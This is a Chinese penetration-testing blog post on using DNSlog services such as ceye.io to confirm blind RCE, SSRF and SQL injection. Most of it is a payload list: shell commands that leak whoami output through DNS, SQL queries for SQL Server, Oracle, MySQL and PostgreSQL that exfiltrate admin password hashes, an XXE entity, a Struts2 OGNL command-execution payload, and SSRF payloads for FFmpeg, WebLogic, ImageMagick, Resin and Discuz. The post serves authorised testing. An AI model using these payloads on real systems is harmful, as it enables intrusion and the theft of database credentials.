0x00 写这篇博客的原因是wb在线的面试中无回显rce的问题在这里填了这个坑
0x10 下面是几个常用的dnslog平台
1 http://ceye.io/ 2 http://www.dnslog.cn/ 3 https://github.com/BugScanTeam/DNSLog(开源可自行搭建的平台)
0x20 dnslog平台的作用
现在很多漏洞都没有办法去回显,可是我们的payload已经执行,所以我们需要使用一些第三方的dnslog平台去验证我们的漏洞的存在性。dnslog的利用方法主要涉及到以下几种漏洞的情况
1 rce 2 ssrf 3 blind sql 4 ...
0x30 dnslog利用方式
这里通过ceyo.io为例
这里在作者windows系统下测试,发现使用ping `whoami`.1u2gcq.ceye.io这样的命令并不好使结果产生的是找不到主机。
curl http://1u2gcq.ceye.io/whoami也并没有使用回显当前用户的权限。
唯一能够行得通的命令
ping %os%.12345.ceye.io
当%%中的为系统参数可以去执行,如果是本地参数有可能也无法去执行。
下面为一些公开的payload
1 0x00 Command Execution 2 i. *nix: 3 curl http://ip.port.b182oj.ceye.io/`whoami` 4 ping `whoami`.ip.port.b182oj.ceye.io 5 ii. windows 6 ping %USERNAME%.b182oj.ceye.io 7 0x01 SQL Injection 8 i. SQL Server 9 DECLARE @host varchar(1024); 10 SELECT @host=(SELECT TOP 1 11 master.dbo.fn_varbintohexstr(password_hash) 12 FROM sys.sql_logins WHERE name='sa') 13 +'.ip.port.b182oj.ceye.io'; 14 EXEC('master..xp_dirtree 15 "\\'+@host+'\foobar$"'); 16 ii. Oracle 17 SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io'); 18 SELECT UTL_HTTP.REQUEST('http://ip.port.b182oj.ceye.io/oracle') FROM DUAL; 19 SELECT HTTPURITYPE('http://ip.port.b182oj.ceye.io/oracle').GETCLOB() FROM DUAL; 20 SELECT DBMS_LDAP.INIT(('oracle.ip.port.b182oj.ceye.io',80) FROM DUAL; 21 SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.b182oj.ceye.io',80) FROM DUAL; 22 iii. MySQL 23 SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc')); 24 iv. PostgreSQL 25 DROP TABLE IF EXISTS table_output; 26 CREATE TABLE table_output(content text); 27 CREATE OR REPLACE FUNCTION temp_function() 28 RETURNS VOID AS $ 29 DECLARE exec_cmd TEXT; 30 DECLARE query_result TEXT; 31 BEGIN 32 SELECT INTO query_result (SELECT passwd 33 FROM pg_shadow WHERE usename='postgres'); 34 exec_cmd := E'COPY table_output(content) 35 FROM E\'\\\\\\\\'||query_result||E'.psql.ip.port.b182oj.ceye.io\\\\foobar.txt\''; 36 EXECUTE exec_cmd; 37 END; 38 $ LANGUAGE plpgsql SECURITY DEFINER; 39 SELECT temp_function(); 40 0x02 XML Entity Injection 41 <?xml version="1.0" encoding="UTF-8"?> 42 <!DOCTYPE root [ 43 <!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test"> 44 %remote;]> 45 <root/> 46 0x03 Others 47 i. Struts2 48 xx.action?redirect:http://ip.port.b182oj.ceye.io/%25{3*4} 49 xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://ip.port.b182oj.ceye.io/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()} 50 ii. FFMpeg 51 #EXTM3U 52 #EXT-X-MEDIA-SEQUENCE:0 53 #EXTINF:10.0, 54 concat:http://ip.port.b182oj.ceye.io 55 #EXT-X-ENDLIST 56 iii. Weblogic 57 xxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip.port.b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search 58 iv. ImageMagick 59 push graphic-context 60 viewbox 0 0 640 480 61 fill 'url(http://ip.port.b182oj.ceye.io)' 62 pop graphic-context 63 v. Resin 64 xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://ip.port.b182oj.ceye.io/ssrf 65 vi. Discuz 66 http://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://ip.port.b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo